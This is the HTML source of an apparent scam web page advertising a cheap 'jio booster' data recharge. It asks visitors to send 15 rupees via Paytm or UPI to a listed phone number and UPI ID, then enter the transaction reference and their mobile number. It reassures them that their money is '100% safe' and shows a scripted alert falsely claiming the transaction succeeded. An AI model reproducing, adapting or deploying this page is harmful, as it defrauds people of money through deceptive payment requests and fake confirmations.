
<html>
    <head> 
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width"><style>
input[type=text], select {
    width: 100%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
input[type=submit] {
    width: 50%;
    background-color: #4CAF50;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;}input[type=submit]:hover {
    background-color: #45a049;}div {
    border-radius: 5px;
    background-color: #f2f2f2;
    padding: 20px;
}

a{
text-decoration:none;
}
.error{background:#ffebe8; border:1px solid #dd3c10; padding:2px; text-align:center; font-weight:normal; color:maroon;}
.success {background:#fff8cc; border:1px solid #ffe222; padding:10px; text-align:center; font-weight:normal; color:#000;}
</style>
<title>jio</title>
<style type="text/css"></style>
</head>
<script> function aclick(){ document.getElementById("submit").click();	 } </script>

<script>

var eta_ms = new Date(2019, 7, 26, 00, 00).getTime() - Date.now();

if(eta_ms>0) var timeout = setTimeout(function(){location.reload();}, eta_ms);

function alertmsg(){
    alert('Thanks, Your Transaction is being successful please wait for a while!')
}

</script>

<body onLoad="aclick();">
<center>
<hr/> 
<b><font color='#B600BD' size='3'>jio booster</font></b>
<hr/>

<font color='red'><marquee><b><i>SOMETIMES RECHARGE COMES LATE || DON'T PANIC YOUR MONEY IS 100% SAFE</marquee></i>
</b><br><br>
<center><font color='blue' size='4px'><strong>-:TOTAL BOOSTER AVAILABLE = 625:-<br></font>
		
	<center><br><font color='black' size='3px'><fieldset><center>SEND <font color='red' size='4px'>15</font> PAYTM TO <font color='red'><b>7489356891 </b></font><font color='blue'><b>(Dont Send On Bank. Wallet Only)</b></font>
<hr><font color='green' size='3px'>OR</font><hr>
<font color='black' size='3px'>SEND <font color='red' size='4px'>15</font> UPI TO <font color='red'><b>7489356891.wallet@paytm </b></font>
		<form action='' method='GET'><hr>
<font color='' size='3px'>Enter Paytm Wallet Ref. / UTR Id<br>
<input type='text' name='txn' value='' maxlength='12' placeholder='Paytm Wallet Ref. / Upi Ref.' required<br><br>
<label> ENTER NUMBER FOR RECHARGE</label><br>
<input type='text' name='numbere' value='' placeholder="Enter your mobile number" required ><br><br>
	</select>
<input type='submit' name='submit' value='submit' onclick="alertmsg()">
</form><div class='success'><font color='red'size='3px'></font><a   style=text-decoration:none> REPEAT RECHARGE :- WAIT 10 MIN</a></div><br><center><font color='black' size='3px'><strong>-:NOTE 25 RS 2 GB DATA BOOSTER=15 RS [JIO]:-<br>